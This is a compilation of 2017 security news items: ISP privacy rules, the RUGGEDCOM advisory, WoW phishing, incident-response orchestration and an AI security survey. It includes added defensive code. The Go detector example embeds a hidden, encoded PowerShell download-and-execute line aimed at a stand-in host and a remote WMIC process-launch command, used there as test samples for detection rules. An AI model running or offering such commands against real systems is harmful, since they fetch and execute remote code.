Hybrid office spaces designed around the worker

Eighty-six percent of employees say face-to-face interaction will always be important for work and 71 percent of the app generation believe it is important to connect in person with coworkers. Offices will be designed around employees, with workspaces that bring together teams, spark conversation, and create the best ideas.

“IT leaders are dealing with a complex working environment, balancing the demands of multiple generations in the workplace while navigating the challenges of operational responsibilities, budget pressures, and customer expectations. Yet today’s IT leaders also understand this presents a fantastic opportunity to take the lead in shaping the future of work,” said Derek Yoo, CTO at Fuze.


from Help Net Security http://ift.tt/2ojMSap

Mastercard acquires NuData Security

Mastercard has entered into an agreement to acquire NuData Security, a technology company that helps businesses prevent online and mobile fraud using session and biometric indicators. Terms of the agreement were not disclosed.


Mastercard will build on its commitment to drive greater protection in the digital space, integrating NuData to its already robust suite of fraud management and security products. The acquisition will also strengthen its efforts around device-level security and authentication, enabling near real-time collaboration between issuers, merchants and processors.

“Securing all payments today and tomorrow remains a top priority for Mastercard,” said Ajay Bhalla, president of enterprise risk and security for Mastercard. “The addition of NuData will build on our layered security strategy to safeguard each and every transaction across the globe. The combination of session and biometric information will provide even richer context around potential cyber and device-specific threats, enabling us to deliver even greater trust and peace of mind.”

NuData’s flagship NuDetect product identifies authentic users from potential fraudsters based on their online, mobile app and smartphone interactions, flagging those that represent the highest risk. The technology assesses, scores and learns from each online or mobile transaction to enable merchants and issuers to make near real-time authorization decisions.

“We’re excited to join the Mastercard family,” said Michel Giasson, CEO, NuData. “For nearly a decade, we’ve worked to develop innovative solutions to help transform the way banks and merchants digitally interact with consumers. Those efforts will continue and accelerate through our collective enhanced capabilities to secure the digital landscape, while offering an enhanced user experience.”


from Help Net Security http://ift.tt/2oB1O3d

US Congress votes for ISPs to be able to sell customers’ info and browsing history

After the US Senate, the US House of Representatives has voted on whether the privacy rules imposed late last year by the Federal Communications Commission (FCC) on Internet service providers should go into effect.


As in the Senate before this, the majority of the representatives – 215 of the 420 present – voted for the rules to be scrapped.

Such a resolution, if signed by US President Donald Trump, will mean that ISPs and mobile data carriers will be able to sell or share their customers' Web browsing and app usage history and other private information to advertisers and other third parties, without having to ask those customers for permission.

It would also mean that the Federal Communications Commission will, in the future, likely not be able to issue new rules for protecting the privacy of consumers.

Organizations that fight for US citizens’ civil and digital liberties are opposed to this resolution, and have been fighting against it.

ACLU Legislative Counsel Neema Singh Guliani has urged President Trump to veto this resolution “and show he is not just a president for CEOs but for all Americans.”

The Electronic Frontier Foundation has recently published a post warning about a number of negative consequences that could arise if this legislation is allowed to pass.

Those include ISPs collecting user information and not protecting it well enough from hackers, pushing for means to thwart encryption, inserting ads into customers’ browsing, using pre-installed spyware and unremovable tracking tags and cookies.

“Should President Donald Trump sign S.J. Res. 34 into law, big Internet providers will be given new powers to harvest your personal information in extraordinarily creepy ways. They will watch your every action online and create highly personalized and sensitive profiles for the highest bidder. All without your consent,” EFF’s Legislative Counsel Ernesto Falcon pointed out.

“This breaks with the decades long legal tradition that your communications provider is never allowed to monetize your personal information without asking for your permission first. This will harm our cybersecurity as these companies become giant repositories of personal data. It won’t be long before the government begins demanding access to the treasure trove of private information Internet providers will collect and store.”

How to protect your information from ISPs?

Using your browser’s private or incognito mode will do nothing, as it only prevents the browser from seeing and “remembering” which websites you visited.

Websites that implement encrypted communications (e.g. use HTTPS) will prevent ISPs and mobile data carriers from seeing what users do on these sites, but won’t prevent them knowing that they visited them. Add-ons like HTTPS Everywhere can only minimize the extent of specific ISP tracking, not remove it altogether. Still, switching to encrypted communications and HTTPS-protected websites is a good idea.
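The distinction above, that HTTPS hides what you do on a site but not that you visited it, comes down to which parts of a URL leave the browser in the clear: the hostname is exposed by the DNS lookup and by the TLS Server Name Indication field, while the path and query travel inside the encrypted connection, and the fragment is never sent to anyone. The following is an added example, not code from the article, that models this for a constructed browsing session; it assumes no encrypted DNS or encrypted SNI is in use, which was the norm at the time.

```python
"""Model which parts of a URL an on-path ISP can observe.

Added example; not part of the original article. Assumption: plain DNS and
cleartext TLS SNI, so the hostname always leaks; path and query are hidden
only when the scheme is https.
"""
from collections import Counter
from typing import Dict, List, Tuple
from urllib.parse import urlsplit


def isp_view(url: str) -> Dict[str, dict]:
    """Split a URL into what the ISP sees, what HTTPS hides, and what is never sent."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("only http and https URLs are modelled")
    host = (parts.hostname or "").lower()
    port = parts.port or (443 if parts.scheme == "https" else 80)
    # Hostname and port leak regardless of scheme: the DNS query goes out
    # before the connection, and the TLS ClientHello carries the name in SNI.
    visible = {"scheme": parts.scheme, "host": host, "port": port}
    on_the_wire = {"path": parts.path or "/", "query": parts.query}
    hidden: dict = {}
    if parts.scheme == "https":
        hidden = on_the_wire          # carried inside the TLS tunnel
    else:
        visible.update(on_the_wire)   # plain HTTP: readable end to end
    # The fragment is resolved by the browser and never transmitted.
    return {"visible_to_isp": visible,
            "hidden_from_isp": hidden,
            "never_sent": {"fragment": parts.fragment}}


def isp_history(urls: List[str]) -> List[Tuple[str, int]]:
    """The ISP's 'browsing history' of a session: hostnames and visit counts.

    For HTTPS sites no page-level detail is available, only the host.
    Sorted by descending count, then name.
    """
    counts = Counter(isp_view(u)["visible_to_isp"]["host"] for u in urls)
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


# Constructed session: two HTTPS sites and one plain-HTTP site.
SESSION = [
    "https://mail.example.com/inbox",
    "https://mail.example.com/inbox?folder=drafts",
    "https://clinic.example.net/results/123",
    "http://news.example.org/article/1?ref=newsletter",
]

if __name__ == "__main__":
    for u in SESSION:
        print(u, "->", isp_view(u))
    print("ISP history:", isp_history(SESSION))
```

Running it on the constructed session shows the practical limit of the advice: the ISP record contains mail.example.com, clinic.example.net and news.example.org either way, but only for the plain-HTTP site does it also contain the article path and query string.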

Using a VPN or Tor might help some, but there are some sites that block access attempts from such sources. Also, in the case of VPNs, you need to be able to trust those companies that they won’t be collecting your browsing data and selling it themselves.

You might want to try and switch to one of the small ISPs that oppose the resolution, but the option will not be available for all users.

And, unfortunately, there is no easy way for individual, tech-unsavvy users to check the devices they received or bought directly from providers for spyware.


from Help Net Security http://ift.tt/2oysv8u

Siemens RUGGEDCOM industrial communication devices vulnerable to remote attacks

All versions of Siemens RUGGEDCOM ROX I VPN endpoints and firewall devices sport five vulnerabilities that can be exploited by attackers to perform actions with administrative privileges.


The announcement was made via advisories from both Siemens and the US ICS-CERT, and the discovery of four of the five vulnerabilities was credited to security researcher Maxim Rupp, of German cybersecurity services firm Cure53.

RUGGEDCOM ROX-based devices are used to connect devices that operate in harsh environments such as electric utility substations and traffic control cabinets, and are deployed by organizations in the energy, healthcare, and transportation industries across the world.

The vulnerabilities

The vulnerabilities affect the devices’ web interface and integrated web server (both at port 10000/TCP), some are remotely exploitable, and they don’t require attackers to possess a high skill level.

By taking advantage of the flaws, attackers could access sensitive information, perform actions with the privileges of an authenticated user, change configuration settings, and perform Cross-Site Scripting (XSS) attacks.

Two of the vulnerabilities can be triggered by tricking users into clicking on a malicious link, although there are some other conditions that have to be met in order for the exploit to work, namely that a privileged session is open in the same browser.

A set of solutions for the issues

No patches for the issues have been offered, and there is no indication they will be.

Still, Siemens has offered a number of mitigations that should remove all risk, and they include:

  • Using a provided mitigation tool to disable the web interface and guest and operator accounts
  • Restricting access to the devices to trusted administrators only
  • Applying cell protection (as defined in Siemens’s operational guidelines for Industrial Security)
  • Using VPN for protecting network communication between cells
  • Applying Defense-in-Depth principles, and
  • Protecting network access to the web interface with appropriate mechanisms.
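Two of the listed mitigations, restricting access to trusted administrators and protecting network access to the web interface, are only as good as their enforcement, and the advisory gives you the one fact needed to verify it: the interface listens on 10000/TCP. The following is an added example, not Siemens' mitigation tool or any code from the advisory, that audits a firewall log for connections to that port from outside a trusted admin subnet. The log format and the 10.10.50.0/28 admin subnet are constructed assumptions.

```python
"""Audit firewall logs for access to the RUGGEDCOM web UI (10000/TCP).

Added example; not Siemens' tooling. The log format is a constructed
key=value layout and the trusted admin subnet is an assumption.
"""
import ipaddress
import re
from typing import Dict, List

# Port named in the advisory for the web interface and integrated web server.
WEB_UI_PORT = 10000
# Assumption: only engineering workstations in this subnet may reach the UI.
TRUSTED_ADMIN_NETS = [ipaddress.ip_network("10.10.50.0/28")]

# Constructed, simplified firewall log line layout.
LINE_RE = re.compile(
    r"src=(?P<src>[\d.]+)\s+dst=(?P<dst>[\d.]+)\s+proto=(?P<proto>\w+)"
    r"\s+dport=(?P<dport>\d+)\s+action=(?P<action>\w+)"
)


def is_trusted_admin(src: str) -> bool:
    """True when the source address lies in a trusted admin subnet."""
    ip = ipaddress.ip_address(src)
    return any(ip in net for net in TRUSTED_ADMIN_NETS)


def audit_web_ui_access(lines: List[str]) -> List[Dict[str, str]]:
    """One finding per web-UI connection that did not come from a trusted host.

    Accepted connections are 'high' (the restriction is not in force);
    denied ones are 'low' (blocked as intended, but still worth a look).
    """
    findings: List[Dict[str, str]] = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue  # unrelated or malformed line
        if m["proto"].lower() != "tcp" or int(m["dport"]) != WEB_UI_PORT:
            continue
        if is_trusted_admin(m["src"]):
            continue
        findings.append({
            "src": m["src"],
            "dst": m["dst"],
            "action": m["action"],
            "severity": "high" if m["action"].lower() == "accept" else "low",
        })
    return findings


# Constructed sample log: one trusted admin, one untrusted host that got in,
# one untrusted host that was blocked, one unrelated port, one noise line.
SAMPLE_LOG = [
    "2017-03-30T10:01:02Z fw1 src=10.10.50.3 dst=10.20.1.5 proto=tcp dport=10000 action=accept",
    "2017-03-30T10:02:15Z fw1 src=192.0.2.44 dst=10.20.1.5 proto=tcp dport=10000 action=accept",
    "2017-03-30T10:03:40Z fw1 src=10.30.7.9 dst=10.20.1.5 proto=tcp dport=10000 action=deny",
    "2017-03-30T10:04:01Z fw1 src=192.0.2.44 dst=10.20.1.5 proto=tcp dport=443 action=accept",
    "2017-03-30T10:05:00Z fw1 link up on eth1",
]

if __name__ == "__main__":
    for f in audit_web_ui_access(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['src']} -> {f['dst']}:{WEB_UI_PORT} {f['action']}")
```

A 'high' finding means the cell boundary is not enforcing the restriction the advisory asks for; a steady stream of 'low' findings from one source is the kind of thing worth correlating with the XSS and malicious-link scenarios described above.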


from Help Net Security http://ift.tt/2ogsirf

Security Orchestration and Incident Response

Last month at the RSA Conference, I saw a lot of companies selling security incident response automation. Their promise was to replace people with computers -- sometimes with the addition of machine learning or other artificial intelligence techniques -- and to respond to attacks at computer speeds.

While this is a laudable goal, there's a fundamental problem with doing this in the short term. You can only automate what you're certain about, and there is still an enormous amount of uncertainty in cybersecurity. Automation has its place in incident response, but the focus needs to be on making the people effective, not on replacing them -- security orchestration, not automation.

This isn't just a choice of words -- it's a difference in philosophy. The US military went through this in the 1990s. What was called the Revolution in Military Affairs (RMA) was supposed to change how warfare was fought. Satellites, drones and battlefield sensors were supposed to give commanders unprecedented information about what was going on, while networked soldiers and weaponry would enable troops to coordinate to a degree never before possible. In short, the traditional fog of war would be replaced by perfect information, providing certainty instead of uncertainty. They, too, believed certainty would fuel automation and, in many circumstances, allow technology to replace people.

Of course, it didn't work out that way. The US learned in Afghanistan and Iraq that there are a lot of holes in both its collection and coordination systems. Drones have their place, but they can't replace ground troops. The advances from the RMA brought with them some enormous advantages, especially against militaries that didn't have access to the same technologies, but never resulted in certainty. Uncertainty still rules the battlefield, and soldiers on the ground are still the only effective way to control a region of territory.

But along the way, we learned a lot about how the feeling of certainty affects military thinking. Last month, I attended a lecture on the topic by H.R. McMaster. This was before he became President Trump's national security advisor-designate. Then, he was the director of the Army Capabilities Integration Center. His lecture touched on many topics, but at one point he talked about the failure of the RMA. He confirmed that military strategists mistakenly believed that data would give them certainty. But he took this change in thinking further, outlining the ways this belief in certainty had repercussions in how military strategists thought about modern conflict.

McMaster's observations are directly relevant to Internet security incident response. We too have been led to believe that data will give us certainty, and we are making the same mistakes that the military did in the 1990s. In a world of uncertainty, there's a premium on understanding, because commanders need to figure out what's going on. In a world of certainty, knowing what's going on becomes a simple matter of data collection.

I see this same fallacy in Internet security. Many companies exhibiting at the RSA Conference promised to collect and display more data and that the data will reveal everything. This simply isn't true. Data does not equal information, and information does not equal understanding. We need data, but we also must prioritize understanding the data we have over collecting ever more data. Much like the problems with bulk surveillance, the "collect it all" approach provides minimal value over collecting the specific data that's useful.

In a world of uncertainty, the focus is on execution. In a world of certainty, the focus is on planning. I see this manifesting in Internet security as well. My own Resilient Systems -- now part of IBM Security -- allows incident response teams to manage security incidents and intrusions. While the tool is useful for planning and testing, its real focus is always on execution.

Uncertainty demands initiative, while certainty demands synchronization. Here, again, we are heading too far down the wrong path. The purpose of all incident response tools should be to make the human responders more effective. They need both the ability and the capability to exercise it effectively.

When things are uncertain, you want your systems to be decentralized. When things are certain, centralization is more important. Good incident response teams know that decentralization goes hand in hand with initiative. And finally, a world of uncertainty prioritizes command, while a world of certainty prioritizes control. Again, effective incident response teams know this, and effective managers aren't scared to release and delegate control.

Like the US military, we in the incident response field have shifted too much into the world of certainty. We have prioritized data collection, preplanning, synchronization, centralization and control. You can see it in the way people talk about the future of Internet security, and you can see it in the products and services offered on the show floor of the RSA Conference.

Automation, too, is fixed. Incident response needs to be dynamic and agile, because you are never certain and there is an adaptive, malicious adversary on the other end. You need a response system that has human controls and can modify itself on the fly. Automation just doesn't allow a system to do that to the extent that's needed in today's environment. Just as the military shifted from trying to replace the soldier to making the best soldier possible, we need to do the same.

For some time, I have been talking about incident response in terms of OODA loops. This is a way of thinking about real-time adversarial relationships, originally developed for airplane dogfights, but much more broadly applicable. OODA stands for observe-orient-decide-act, and it's what people responding to a cybersecurity incident do constantly, over and over again. We need tools that augment each of those four steps. These tools need to operate in a world of uncertainty, where there is never enough data to know everything that is going on. We need to prioritize understanding, execution, initiative, decentralization and command.

At the same time, we're going to have to make all of this scale. If anything, the most seductive promise of a world of certainty and automation is that it allows defense to scale. The problem is that we're not there yet. We can automate and scale parts of IT security, such as antivirus, automatic patching and firewall management, but we can't yet scale incident response. We still need people. And we need to understand what can be automated and what can't be.

The word I prefer is orchestration. Security orchestration represents the union of people, process and technology. It's computer automation where it works, and human coordination where that's necessary. It's networked systems giving people understanding and capabilities for execution. It's making those on the front lines of incident response the most effective they can be, instead of trying to replace them. It's the best approach we have for cyberdefense.

Automation has its place. If you think about the product categories where it has worked, they're all areas where we have pretty strong certainty. Automation works in antivirus, firewalls, patch management and authentication systems. None of them is perfect, but all those systems are right almost all the time, and we've developed ancillary systems to deal with it when they're wrong.

Automation fails in incident response because there's too much uncertainty. Actions can be automated once the people understand what's going on, but people are still required. For example, IBM's Watson for Cyber Security provides insights for incident response teams based on its ability to ingest and find patterns in an enormous amount of freeform data. It does not attempt a level of understanding necessary to take people out of the equation.

From within an orchestration model, automation can be incredibly powerful. But it's the human-centric orchestration model -- the dashboards, the reports, the collaboration -- that makes automation work. Otherwise, you're blindly trusting the machine. And when an uncertain process is automated, the results can be dangerous.

Technology continues to advance, and this is all a changing target. Eventually, computers will become intelligent enough to replace people at real-time incident response. My guess, though, is that computers are not going to get there by collecting enough data to be certain. More likely, they'll develop the ability to exhibit understanding and operate in a world of uncertainty. That's a much harder goal.

Yes, today, this is all science fiction. But it's not stupid science fiction, and it might become reality during the lifetimes of our children. Until then, we need people in the loop. Orchestration is a way to achieve that.

This essay previously appeared on the Security Intelligence blog.


from Schneier on Security http://ift.tt/2ogctko

Phishers offer WoW players free in-game pets

Avid World of Warcraft players are being targeted with phishing emails seemingly coming from Blizzard Entertainment, the video game developer behind the popular multiplayer role-playing game, warns Malwarebytes’ Chris Boyd.


The email is supposedly a notification that a friend has purchased an in-game pet for the email recipient, who can claim said pet by logging into Battle.net, Blizzard's online gaming platform.

Unfortunately, clicking the button in the email will direct the recipient to a web page that looks a bit like Battle.net’s login page, but is not – it’s a phishing website created to collect victims’ login credentials.

The (long) URL of the blocked phishing site mentions Battle.net, “password verify”, “login”, and “account support”, in the attempt to convince potential victims of the site’s legitimacy.

The Google Safe Browsing service is already warning visitors that the website is deceptive, and can trick them into doing something dangerous, like installing software or disclosing sensitive information.

Still, it’s a piece of cake for the scammers to set up a new one and simply change the link in the phishing email, so the threat is still there, and gamers should be wary.
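The URL trick described above, stuffing the brand name and words like "login", "password verify" and "account support" into a domain the brand does not own, is exactly the pattern a simple URL heuristic can catch even after the scammers move to a fresh host that Safe Browsing has not flagged yet. The following is an added example, not Malwarebytes' or Blizzard's code; it uses battle.net as the only allowlisted domain (a real allowlist would hold all of the vendor's domains), and the sample URLs are constructed under the reserved .example TLD.

```python
"""Heuristic scorer for brand-impersonating credential-phishing URLs.

Added example; not from the article or any vendor. Assumptions: the
allowlist below is the vendor's real domain set, and a hostname counts as
legitimate only if it is that domain or a subdomain of it.
"""
from typing import List, Tuple
from urllib.parse import urlsplit

ALLOWLISTED_DOMAINS = {"battle.net"}
BRAND_TOKENS = ("battle.net", "battlenet", "blizzard")
# Words that lure victims toward typing credentials.
LURE_TOKENS = ("login", "password", "verify", "account", "support", "secure")


def under_domain(host: str, domain: str) -> bool:
    """True for the domain itself or any subdomain; a mere substring is NOT enough,
    so 'battle.net.evil.example' does not pass."""
    return host == domain or host.endswith("." + domain)


def score_url(url: str) -> Tuple[int, List[str]]:
    """Return (score, reasons). Higher is more phishing-like; 0 for allowlisted hosts."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    rest = (parts.path + "?" + parts.query).lower()
    if any(under_domain(host, d) for d in ALLOWLISTED_DOMAINS):
        return 0, ["hostname is under an allowlisted domain"]
    score, reasons = 0, []
    if any(t in host for t in BRAND_TOKENS):
        score += 3
        reasons.append("brand name inside a hostname the brand does not own")
    if any(t in rest for t in BRAND_TOKENS):
        score += 2
        reasons.append("brand name in the path or query")
    lures = [t for t in LURE_TOKENS if t in host or t in rest]
    if lures:
        score += len(lures)
        reasons.append("credential-lure words: " + ", ".join(lures))
    if parts.scheme == "http":
        score += 1
        reasons.append("login-style page served over plain HTTP")
    return score, reasons


def is_suspicious(url: str, threshold: int = 4) -> bool:
    """Threshold is an assumption; tune against your own mail stream."""
    return score_url(url)[0] >= threshold


# Constructed samples: a genuine-looking subdomain of the real domain, and a
# lookalike that puts the brand name in front of an unrelated domain.
LEGIT = "https://eu.battle.net/login/en/"
LOOKALIKE = "http://battle.net.account-support.example/password-verify/login/"

if __name__ == "__main__":
    for u in (LEGIT, LOOKALIKE):
        s, why = score_url(u)
        print(f"{s:2d} {'SUSPICIOUS' if is_suspicious(u) else 'ok        '} {u}")
        for r in why:
            print("    -", r)
```

The deliberate weakness to be aware of is the suffix test: it only works because the allowlist holds registrable domains, so a list built from full hostnames (eu.battle.net) would wrongly reject other legitimate subdomains.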


from Help Net Security http://ift.tt/2ofNlKO

Tuesday, March 28, 2017

Why we should define our right to privacy now, before it’s too late

The debate has stirred up again. Talk of wiretapping and government spying has spurred another bout of privacy versus security. Internet of Things (IoT) devices have raised suspicion that strangers are listening to us or watching us using everything from TVs to toys.

But all this talk of snooping, eavesdropping, and hacking is a red herring. It’s a distraction. The central question in all of this, one that few are actually talking about, is whether privacy is a human right and what should be done to protect and cherish it.

Security professionals and businesses entrusted with our data have borne the cost and operational responsibility of protecting privacy for too long. What we need is a constitutional amendment that very clearly defines a right to privacy. Without one, we’ll forever be looking over our digital shoulders.

Privacy should be defended as a human right

Seemingly every week, another data breach leaks more of our personal information. Ransom attacks continue to grow, holding our private data hostage until we pay up. Our credit card numbers, our passwords, and our medical records are all the targets of hackers.

But the attacks don’t always come from enemies. Our government can potentially peer into our lives, whether through incidental surveillance or zero-day vulnerabilities that give them access to our devices or apps.

Even our favorite companies can do harm. Businesses, by not taking better steps to secure their IT environments, put in jeopardy the troves of data we hand to them. On a more concerning note, some connected children’s toys can collect audio in our homes without authorization, and the expansion of smart home devices allows companies to collect increasingly personal data about our habits and preferences.

The cost and the responsibility of defending our privacy have always fallen on the organizations we trust our data to and whose devices we buy. Some businesses are better about protecting those assets than others.

But defending data privacy, as important as that is, has always been just the tip of the iceberg.

Our right to privacy extends much further than just our data. It’s our right to our own thoughts and private moments. It’s being able to have a conversation, send a text, or simply relax in our own homes without wondering whether someone else is watching or listening in.

But right now there are no laws that adequately defend our privacy and give us ownership of those moments. Nothing specifically guides whether the government, businesses, or others can confiscate, sell, or use them.

Yet these moments are fundamental to our humanity. Our privacy should be defended like life, liberty, and the pursuit of happiness as unalienable rights. It should be codified by Constitutional amendment like our freedom of speech, religion, and assembly.

Privacy and the Constitution

The right to privacy has been defended by the Supreme Court, which has cited various amendments to the Constitution, including the first, third, fourth, fifth, and fourteenth, in a number of different cases. But we need something more explicit in its protections, something that can encompass the trails of data we leave in the wake of every action, something that can return control of ourselves to ourselves.

A potential amendment to guard our privacy should include the following provisions:

  • U.S. citizens have a right to privacy. Period.
  • Citizens have ownership over their data, from personally identifying information to internet avatars and profiles.
  • Citizens choose who can access that data, when, and for how long.
  • Citizens can opt out of government programs, choosing privacy over security.

By codifying these protections in a new amendment, we can clarify court cases, ascribe responsibility for better security that ensures our privacy, and shore up an essential part of what makes us human as technology offers more ways to tap into our thoughts, feelings, and private moments.

Adding these rights to the Constitution would elevate the right to privacy to the echelon of speech, press, and other rights that are fundamental not only to our personal identity, but to our American identity.

Technology saves us time, connects us across vast distances, delivers entertainment, keeps us safe, advances scientific discovery, and every day makes the world better. But as it does, we need to make sure we guard what makes us human – including our privacy, which is under assault by hackers, can be compromised by security-focused governments, and sometimes lacks optimal security from corporations.

It’s time to define and defend our right to privacy once and for all.


from Help Net Security http://ift.tt/2ofAckH

Modern security programs: Artificial intelligence and machine learning

A new research report by Carbon Black aggregates insight from more than 400 interviews with leading cybersecurity researchers who discussed non-malware attacks, artificial intelligence (AI) and machine learning (ML), among other topics.


“Based on how cybersecurity researchers perceive current AI-driven security solutions, cybersecurity is still very much a ‘human vs. human’ battle, even with the increased levels of automation seen on both the offensive and defensive sides of the battlefield,” said Carbon Black CTO, Michael Viscuso. “And, the fault with machine learning exists in how much emphasis organizations may be placing on it and how they are using it. Static, analysis-based approaches relying exclusively on files have historically been popular, but they have not proven sufficient for reliably detecting new attacks. Rather, the most resilient ML approaches involve dynamic analysis – evaluating programs based on the actions they take.”

Modern security programs: Key trends

The results were definitive, pointing to the following trends:

  • The vast majority (93%) of cybersecurity researchers said non-malware attacks pose more of a business risk than commodity malware attacks.
  • Nearly two thirds (64%) of cybersecurity researchers said they’ve seen an increase in non-malware attacks since the beginning of 2016. These non-malware attacks are increasingly leveraging native system tools, such as WMI and PowerShell, to conduct nefarious actions, researchers reported.
  • AI is considered by most cybersecurity researchers to be in its nascent stages and not yet able to replace human decision making in cybersecurity. 87% of the researchers said it will be longer than three years before they trust AI to lead cybersecurity decisions.
  • Three quarters (74%) of researchers said AI-driven cybersecurity solutions are still flawed.
  • 70% of cybersecurity researchers said ML-driven security solutions can be bypassed by attackers. Nearly one-third (30%) said attackers could “easily” bypass ML-driven security.
  • Cybersecurity talent, resourcing and trust in executives continue to be top challenges plaguing many businesses.
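The WMI and PowerShell abuse the respondents describe is what behaviour-based detection (the "dynamic analysis" Viscuso contrasts with file-only static analysis) is meant to catch: the process is judged by its parent, its arguments and what those arguments do once decoded, not by a file hash. The Go program below is an added illustration, not code from the Carbon Black report or its authors. The event schema, rule names and the three sample process-creation events are all constructed for this example.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"regexp"
	"strings"
	"unicode/utf16"
)

// ProcessEvent is a simplified process-creation record. The field set is an
// assumption for this example, not a real Sysmon or EDR schema.
type ProcessEvent struct {
	Parent  string // parent image name, e.g. "WINWORD.EXE"
	Image   string // created image name, e.g. "powershell.exe"
	Command string // full command line
}

// Finding names the rule that fired and what triggered it.
type Finding struct{ Rule, Detail string }

var (
	// -e, -enc or -EncodedCommand followed by a base64 blob.
	encodedArg = regexp.MustCompile(`(?i)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})`)
	// Tokens typical of download-and-execute one-liners.
	cradle = regexp.MustCompile(`(?i)downloadstring|downloadfile|invoke-webrequest|net\.webclient|\biex\b|invoke-expression`)
	// WMI used to start a process, locally or on a remote node.
	wmiExec       = regexp.MustCompile(`(?i)process\s+call\s+create|invoke-wmimethod|win32_process`)
	officeParents = map[string]bool{"winword.exe": true, "excel.exe": true, "outlook.exe": true, "powerpnt.exe": true}
	shellImages   = map[string]bool{"powershell.exe": true, "wmic.exe": true, "cmd.exe": true}
)

// decodeEncodedCommand reverses PowerShell's -EncodedCommand encoding
// (base64 over the UTF-16LE bytes of the script). It returns "" when the
// command line has no such argument or the blob does not decode cleanly.
func decodeEncodedCommand(cmdline string) string {
	m := encodedArg.FindStringSubmatch(cmdline)
	if m == nil {
		return ""
	}
	raw, err := base64.StdEncoding.DecodeString(m[1])
	if err != nil || len(raw)%2 != 0 {
		return ""
	}
	u := make([]uint16, len(raw)/2)
	for i := range u {
		u[i] = uint16(raw[2*i]) | uint16(raw[2*i+1])<<8
	}
	return string(utf16.Decode(u))
}

// encodeCommand is the forward direction; it only builds the constructed
// sample below so that no base64 has to be hand-computed.
func encodeCommand(script string) string {
	u := utf16.Encode([]rune(script))
	raw := make([]byte, 2*len(u))
	for i, c := range u {
		raw[2*i], raw[2*i+1] = byte(c), byte(c>>8)
	}
	return base64.StdEncoding.EncodeToString(raw)
}

// Analyze applies the behavioural rules to one event: it judges the process by
// what it does (parent, image, decoded arguments), not by a file hash.
func Analyze(ev ProcessEvent) []Finding {
	var out []Finding
	parent, image := strings.ToLower(ev.Parent), strings.ToLower(ev.Image)
	text := ev.Command
	if decoded := decodeEncodedCommand(ev.Command); decoded != "" {
		out = append(out, Finding{"encoded-command", decoded})
		text += " " + decoded // inspect the decoded script as well
	}
	if m := cradle.FindString(text); m != "" {
		out = append(out, Finding{"download-cradle", m})
	}
	if m := wmiExec.FindString(text); m != "" {
		out = append(out, Finding{"wmi-process-create", m})
	}
	if officeParents[parent] && shellImages[image] {
		out = append(out, Finding{"office-spawns-shell", parent + " -> " + image})
	}
	return out
}

// SampleEvents is constructed input: one benign event and two that misuse
// native tooling in the way the survey respondents describe.
func SampleEvents() []ProcessEvent {
	script := "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
	return []ProcessEvent{
		{"explorer.exe", "powershell.exe", "powershell.exe -NoProfile -Command Get-Process"},
		{"WINWORD.EXE", "powershell.exe", "powershell.exe -w hidden -enc " + encodeCommand(script)},
		{"cmd.exe", "wmic.exe", `wmic /node:host01 process call create "powershell -nop -w hidden"`},
	}
}

func main() {
	for i, ev := range SampleEvents() {
		for _, f := range Analyze(ev) {
			fmt.Printf("event %d: %-20s %s\n", i, f.Rule, f.Detail)
		}
	}
}
```

The benign first event produces no findings; the Word-spawned PowerShell event fires three rules (the encoded argument, the download cradle found only after decoding, and the parent/child relationship), and the WMIC event fires the process-creation rule. None of these rules consults a file hash, which is the point of the "dynamic analysis" argument: the same native binaries are present on every host, so only their behaviour distinguishes the attack.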

Said one cybersecurity researcher: “Non-malware attacks will become so widespread and target even the smallest business that users will become familiar with them. Most users seem to be familiar with the idea that their computer or network may have accidentally become infected with a virus, but rarely consider a person who is actually attacking them in a more proactive and targeted manner.”


from Help Net Security http://ift.tt/2o9a5iF

Don’t forget to pack security for the journey to the cloud

When you move workloads to public cloud platforms, you offload many tasks on the cloud provider, but don’t fall for the misconception that you’re entirely off the hook with security.

Although cloud providers “rent” their computing infrastructure to you, they operate on a “shared security responsibility” model, meaning you still must protect your workloads in the cloud.

So, just as with your on-premises systems, you must perform vulnerability management, policy compliance, malware detection and web app scanning in your cloud instances.

By the same token, the responsibility for extending security to cloud workloads falls on the same constituencies involved with defending your on-premises infrastructure, namely:

The CISO, who needs to see the organization’s on-premises and cloud security posture from a single, central dashboard. If the organization is using multiple cloud platforms, such as Amazon Web Services (AWS), Google Cloud Platform (GCP) and Microsoft Azure, the CISO will want to have visibility across all of them, with details on how each instance is being secured and what workloads are running on them. The CISO will use this information for a variety of purposes, including:

  • To make sure the organization’s security and compliance standards are being met in the cloud
  • To look for opportunities to cut costs and reduce complexity by identifying redundant, obsolete and functionally-narrow security tools and replacing them with integrated cloud-based suites

Vulnerability management / security pros, who are eager to be in the loop as these cloud migrations and deployments are planned and carried out. These staffers want to make sure their security tools can be connected to these cloud infrastructures. They need to know what vulnerabilities exist in the new cloud environment, and which ones are critical, such as zero-day types. Likewise, they need to monitor regulatory and policy compliance. The security team also wants to learn how to establish remediation priorities in cloud environments, which are more elastic, with virtual instances getting spun up and down constantly.

The DevSecOps group, which will want to be part of the entire lifecycle of application development projects carried out in cloud platforms, just as they are involved with the on-premises pipeline. That way, they will be able to “shift left” in the cloud as well, spotting and fixing security issues and vulnerabilities early and often in the app dev process, before code gets to the deployment and production stage.

Auditors, who will want security and compliance reports to have the same format as the ones they’re accustomed to seeing for on-premises systems. This will speed up the auditing process and make auditors happy.

Qualys: One security and compliance platform for all your on-premises and elastic cloud needs

As your IT environment becomes hybrid you’ll need a set of security and compliance tools that can protect your systems both on premises and in the cloud.

This will lower your costs, simplify the management of your security and compliance posture, and both boost and improve your defenses.

Here’s where Qualys can help you. The Qualys Cloud Platform provides consistent, uniform, scalable, versatile and effective visibility of security and compliance posture for hybrid on-premises and elastic-cloud IT environments.

Our suite of 10 integrated security and compliance solutions uses a variety of data collection methods and technologies, and connects to a robust analysis, correlation and reporting back-end engine.

For your cloud workloads, Qualys covers key areas, including:

  • Continuous asset discovery and tracking, dynamic tagging, dashboarding and reporting, to give you “single pane of glass” visibility into all your IT assets, wherever they reside.
